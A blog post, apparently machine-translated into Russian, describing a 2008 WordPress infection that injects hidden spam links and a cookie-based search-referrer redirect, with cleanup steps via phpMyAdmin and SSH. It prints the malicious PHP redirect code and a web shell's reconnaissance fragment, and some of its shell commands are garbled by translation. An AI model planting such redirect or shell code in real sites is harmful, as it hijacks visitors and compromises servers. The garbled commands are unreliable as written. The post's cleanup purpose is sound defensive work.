В прошлом месяце я получил предупреждение Вирус в блоге от некоторых посетителей. Сначала я проигнорировал предупреждения, потому что я установил довольно хороший антивирус (Kaspersky AV 2009) И даже блога в течение длительного времени, я никогда не получал вирус оповещения (давно .. я видел что-то подозревают, что первое обновление исчезли. Наконец ...).
Медленно начал показывать большие изменения посещаемостиПосле чего в последнее время неуклонно уменьшается трафик и начал все больше и больше людей говорят мне, что stealthsettings.com это virused. Вчера я получил от кого-то скриншот делается, когда их антивирусные скрипт от stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Это было довольно убедительно для меня, так что я положил все источники поиска. Первая мысль, которая пришла мне в голову было сделать модернизация последняя WordPress (2.5.1), но не раньше удаления всех файлов в старом скрипте WordPress и сделать резервное копирование базы данных. Эта процедура не сработала, и, вероятно, мне потребовалось бы много времени, чтобы выяснить, где находится ошибка, если бы она не сказала мне. Eugen В дискуссии за чашкой кофе, он обнаружил, ссылка Google и было бы хорошо, чтобы увидеть его.
MyDigitalLife.info опубликовал статью под названием: «WordPress Взлом: восстановление и исправление Google и поисковой системы или трафика без файлов cookie, перенаправленного на Your-Needs.info, AnyResults.Net, Golden-Info.net и другие нелегальные сайты"Это конец нити мне было нужно.
Речь идет о эксплуатировать de WordPress на основе файлов cookieКакой я думаю, что это очень сложная и сделали книгу. Умные достаточно, чтобы сделать SQL-инъекция База данных блога, Для создания невидимых пользователю Простая проверка рутинной Кабинет->Пользователи, проверить сервер каталогов и файлов "записываемый" (что chmod 777), искать и выполнять Файлы с привилегиями группы или корня. Я не знаю, кто эксплуатирует имя и видим, что есть несколько статей, написанных о нем, несмотря на то, что многие блоги инфицированных, в том числе Румынии. Хорошо ... Я постараюсь, чтобы попытаться объяснить общими о вирусе.
Что такое вирус?
Во-первых, вставить источников страницах блогов, ссылки невидимыми для посетителей, но видимых и индексируемая поисковыми системами, особенно Google. Таким образом Передача Page Rank сайтов указанные злоумышленником. Во-вторых, вставлен другой Перенаправление код URL для посетителей из Google, Live, Yahoo, ... или RSS читателя, а не сайт в печенье, антивирус определяет, как перенаправить Trojan-Clicker.HTML.
Симптомы:
Снижение массовые движения посетителяОсобенно в блогах, где большинство посетителей приходят из Google.
Идентификация: (здесь проблема усложняется для тех, кто мало знает о phpmyadmin, php и linux)
Лос-Анджелес. ВНИМАНИЕ! Сначала сделайте резервную копию базы данных!
1. Проверьте исходные файлы index.php, header.php, footer.php, Темой блога и посмотреть, если есть код, который использует шифрование base64 или содержит «if ($ ser ==» 1? && sizeof ($ _ COOKIE) == 0) »в форме:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>
Или ... что-то. Удалить этот код!
Кликните на картинку ...
На скриншоте выше я случайно выбрал и " ". Этот код должен остаться.
2. Использовать PHPMYADMIN и перейдите к таблице базы данных wp_usersГде проверить, если нет имени пользователя создается на 00:00:00 0000-00-00 (Возможно в полевых user_login написать "WordPress». Запишите идентификатор этого пользователя (поле ID), а затем удалите его.
Кликните на картинку ...
* Зеленая линия должна быть удалена и сохранил свой ID. В случае сонныйБыл ID = 8 .
3. Перейти к таблице wp_usermeta, Где вы расположенный и вытирать Линии для ID (где поле user_id ID значение удаляется).
4. В Таблице wp_option, К active_plugins и посмотреть, что плагин включен подозреваемого. Он может быть использован как окончаний _old.giff, _old.pngg, _old.jpeg, _new.php.giffи т. д. сочетания расширений фиктивных изображений с _old и _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'
Удалите этот плагин, затем перейдите в блог -> Панель управления -> Плагины, где вы деактивируете и активируете любой плагин.
Нажмите на картинку, чтобы он появляется active_plugins вирусом файл.
Следуйте по пути на FTP или SSH, указанные в active_plugins и удалить файл с сервера.
5. Кроме того, в PHPMyAdmin, в таблице wp_option, Найти и удалить строку, содержащую "rss_f541b3abd05e7962fcab37737f40fad8"И"internal_links_cache ".
В internal_links_cache, предложил зашифрованные ссылки спама, которые появляются в блог код Google Adsзагривок, Хакер.
6. Рекомендуется изменить пароль Блог и Войти удалить все подозрительные userele. Обновите до последней версии WordPress и настройте блог так, чтобы он больше не позволял регистрировать новых пользователей. Потерь нет… можно и комментарий необитаемый.
Выше я попытался немного объяснить, что делать в такой ситуации, чтобы очистить блог от этого вируса. Проблема намного серьезнее, чем кажется, и почти не решена, потому что они используются уязвимостей хостинг веб-сервер, который является блог.
В качестве первой меры безопасности, имеющие доступ SSH, Сделать некоторые проверки на сервере, чтобы видеть, есть ли файлы, такие как * _old * и * _new. * С окончаний.Гифф,. JPEG,. pngg,. jpgg. Эти файлы должны быть удалены. Если вы переименовать файл, например. top_right_old.giff in top_right_old.phpМы видим, что файл является именно сервер вредоносный код.
Несколько полезных инструкций по проверке, очистке и защите сервера. (через SSH)
1. CD / TMP и проверить, если есть папки, как tmpVFlma или другие комбинации asemenatoare имя и удалите его. Смотрите скриншот ниже, две такие папки на меня:
РМ-РФ имя_папки
2. Проверить и устранить (изменить chmod-ul) по возможности папки с атрибутами chmod 777
найти все доступные для записи файлы в текущем каталоге: Найти. -Type F-Пермь-2-LS
найти все записи каталоги в текущей директории: Найти. -Type D-Пермь-2-LS
найти все доступные для записи каталоги и файлы в текущем каталоге: Найти. -Пермь-2-LS
3. Ищете подозрительных файлов на сервер.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"
4, ВНИМАНИЕ! файлы, которые были установлены бит SUID si SGID. Эти файлы выполняются с привилегиями пользователя (группу) или корень, а не пользователей, которые запускают файл. Эти файлы могут привести к корневой компромисс, если вопросы безопасности. Если вы не используете SUID и SGID файлы с битом, выполнить 'chmod 0 " их или удалить пакет, содержащий их.
Эксплойт содержится где-то в источнике ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
Находит так ... в основном нарушения безопасности. Порты открыть каталог "записи" и группа исполнения привилегии файлов / корень.
Вернуться с подробнее ...
Некоторые блоги инфицированных: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
мотоциклы.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/блог, blog.einvest.ro
... Этот список можно продолжать ... много.
Проверить, не заражен ли блог, можно с помощью поисковой системы Google. копировать вставить:
Сайт: www.blegoo.com купить
Спокойной ночи и хорошей работы;) Думаю, скоро Евгений придет с новостями на prevezibil.imprevizibil.com.
BRB :)
ВНИМАНИЕ! Изменение темы WordPress или перейти на WordPress 2.5.1, НЕ является решением для избавления от этого вируса.